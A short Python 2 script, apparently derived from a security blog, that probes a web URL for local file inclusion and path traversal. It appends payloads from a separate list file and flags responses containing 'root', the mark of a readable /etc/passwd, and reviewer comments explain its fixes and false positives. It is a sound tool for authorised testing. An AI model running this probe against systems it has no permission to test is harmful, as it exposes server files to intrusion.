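#!/usr/bin/env python
# ----
# try_lfi.py - simple check for a local file inclusion (LFI) vulnerability
# ----
# - can also be used to find path traversal vulnerabilities
# - tests can be extended to find more information than just the passwd file.
# more @ http://hauntit.blogspot.com
#
# Written for Python 2: urllib.urlopen() does not exist in Python 3.
import urllib
import sys

SEPARATOR = '---------------------------------------------------------------'

# Validate the argument count BEFORE reading sys.argv[1]. Reading it first
# raised IndexError when no argument was given, so the usage text below was
# never reached.
if len(sys.argv) < 2:
    sys.stderr.write('usage: ' + sys.argv[0] + ' http://localhost/page?param=\n')
    sys.exit(1)

url = sys.argv[1]

# LFItext.txt holds one candidate value per line; each is appended to the URL.
# The context manager closes the handle, which the bare open() never did.
with open('LFItext.txt', 'r') as lfi_file:
    try_lfi = lfi_file.readlines()

print(SEPARATOR)
print('[+] Searching for traversal/LFI vulnerability at URL:  ' + url)
print(SEPARATOR)

for line in try_lfi:
    full_url_to_check = url + line
    try_page = urllib.urlopen(full_url_to_check)
    try:
        read_page = try_page.readlines()
        status = try_page.getcode()
    finally:
        # Release the connection even if reading the response fails.
        try_page.close()

    print('Trying:  ' + line)
    print('Status:  ' + str(status))
    print('\t[~] Now reading the answer to find out if there is our \'vulnerable-string\'...')

    # Heuristic only: the bare substring 'root' also occurs in ordinary page
    # content, so every hit is a candidate to confirm by hand, not a finding.
    for read_lines in read_page:
        if read_lines.find('root') != -1:
            print('\t[+] Found potential LFI bug! This is the answer:  ' + read_lines)

    # NOTE(review): the paste lost its indentation; the separator is assumed
    # to be printed once per tried URL - confirm against the original.
    print(SEPARATOR)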